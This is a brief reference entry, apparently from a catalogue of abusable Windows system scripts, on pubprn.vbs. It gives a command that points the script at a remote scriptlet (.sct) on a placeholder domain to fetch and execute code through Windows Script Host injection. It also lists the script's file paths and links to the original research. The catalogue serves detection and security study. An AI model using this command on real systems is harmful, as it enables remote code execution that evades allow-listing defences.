## Pubprn.vbs * Functions: Execute ``` pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection. ``` * Resources: * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://github.com/enigma0x3/windows-operating-system-archaeology * Full path: * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs * Notes: Thanks to Matt Nelson - @enigma0x3